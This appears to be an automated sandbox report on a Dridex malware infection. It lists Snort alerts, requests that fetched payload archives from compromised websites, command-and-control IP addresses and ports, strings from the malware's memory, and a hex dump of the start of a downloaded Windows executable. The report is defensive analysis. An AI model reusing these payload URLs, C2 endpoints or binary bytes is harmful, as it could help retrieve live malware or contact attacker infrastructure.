Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49305
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49307
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49309
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49308
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49311
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49313
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 195.231.69.151:3889
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Wed, 13 Jan 2021 15:38:57 GMTContent-Type: application/zipContent-Length: 303616Connection: keep-aliveLast-Modified: Fri, 18 Dec 2020 21:13:44 GMTETag: "4a200-5b6c39557f200"alt-svc: quic=":443"; ma=86400; v="43,39"Host-Header: 624d5be7be38418a3e2a818cc8b7029bX-Proxy-Cache: HITAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 f6 fb fe 5f 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 02 32 00 72 04 00 00 2c 00 00 00 00 00 00 e0 1c 00 00 00 10 00 00 00 30 00 00 00 00 00 10 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 10 05 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 63 00 00 c8 00 00 00 00 f0 04 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 dc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 68 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 19 00 00 00 10 00 00 00 1a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e1 00 00 00 00 30 00 00 00 02 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 32 00 00 00 00 00 00 0a 00 00 00 00 40 00 00 00 02 00 00 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 64 61 74 61 32 00 0a 00 00 00 00 50 00 00 00 02 00 00 00 22 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 1c 00 00 00 60 00 00 00 1e 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 35 00 00 50 02 00 00 00 80 00 00 00 04 00 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 74 65 78 74 34 00 00 cc 52 04 00 00 90 00 00 00 54 04 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 40 2e 72 73 72 63 00 00 00 e8 00 00 00 00 f0 04 00 00 02 00 00 00 9a 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 dc 05 00 00 00 00 05 00 00 06 00 00 00 9c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: Joe Sandbox ViewJA3 fingerprint: eb88d0b3e1961a0562f006e5ce2a0b87
Source: global trafficHTTP traffic detected: GET /lpxtpiw.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bipolarmalta.mccarthy.wsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dyu828kp.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: oudtshoornpharmacies.co.zaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /usc3d1.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sendgrid.invoteqleads.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 221.126.244.72
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: unknownTCP traffic detected without corresponding DNS query: 157.7.166.26
Source: unknownTCP traffic detected without corresponding DNS query: 195.231.69.151
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CE39F9 InternetReadFile,
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\272CF97F.emfJump to behavior
Source: global trafficHTTP traffic detected: GET /lpxtpiw.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: bipolarmalta.mccarthy.wsConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /dyu828kp.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: oudtshoornpharmacies.co.zaConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /usc3d1.rar HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sendgrid.invoteqleads.comConnection: Keep-Alive
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknownDNS traffic detected: queries for: bipolarmalta.mccarthy.ws
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: http://crl.microsoft.v&
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.4.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: regsvr32.exe, 00000004.00000003.2116675387.0000000003292000.00000004.00000001.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?dbc0fc39602ef
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabE~w5
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385418324.0000000000598000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: regsvr32.exe, 00000003.00000002.2385462250.0000000001E20000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2385318587.0000000000690000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2385314469.0000000001CF0000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2385487805.00000000009B0000.00000002.00000001.sdmp, regsvr32.exe, 00000007.00000002.2117872818.0000000001CF0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000004.00000002.2386925336.0000000002380000.00000002.00000001.sdmp, regsvr32.exe, 00000006.00000002.2386727384.0000000002380000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://157.7.166.26/
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://157.7.166.26:5353/
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/c7
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151/d7
Source: regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/G
Source: regsvr32.exe, 00000004.00000002.2385230129.000000000061A000.00000004.00000020.sdmpString found in binary or memory: https://195.231.69.151:3889/hy
Source: regsvr32.exe, 00000004.00000002.2385290882.0000000000671000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385411279.0000000000591000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/
Source: regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/3
Source: regsvr32.exe, 00000004.00000002.2385192060.00000000005CF000.00000004.00000020.sdmpString found in binary or memory: https://221.126.244.72/O
Source: regsvr32.exe, 00000004.00000002.2385270128.000000000065A000.00000004.00000020.sdmp, regsvr32.exe, 00000006.00000002.2385442288.00000000005E1000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49188
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49187
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49182
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49313 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49199 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49217
Source: unknownNetwork traffic detected: HTTP traffic on port 49302 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49175
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49296
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49295
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49290
Source: unknownNetwork traffic detected: HTTP traffic on port 49194 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49206
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49205
Source: unknownNetwork traffic detected: HTTP traffic on port 49187 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49289
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49200
Source: unknownNetwork traffic detected: HTTP traffic on port 49301 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49193 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49313
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49295 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49182 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49289 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49205 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49307 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49308
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49307
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49302
Source: unknownNetwork traffic detected: HTTP traffic on port 49290 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49301
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49200 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49217 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49296 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49206 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49308 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49199
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49194
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49193
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49175 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49229
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49225 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49271 version: TLS 1.2
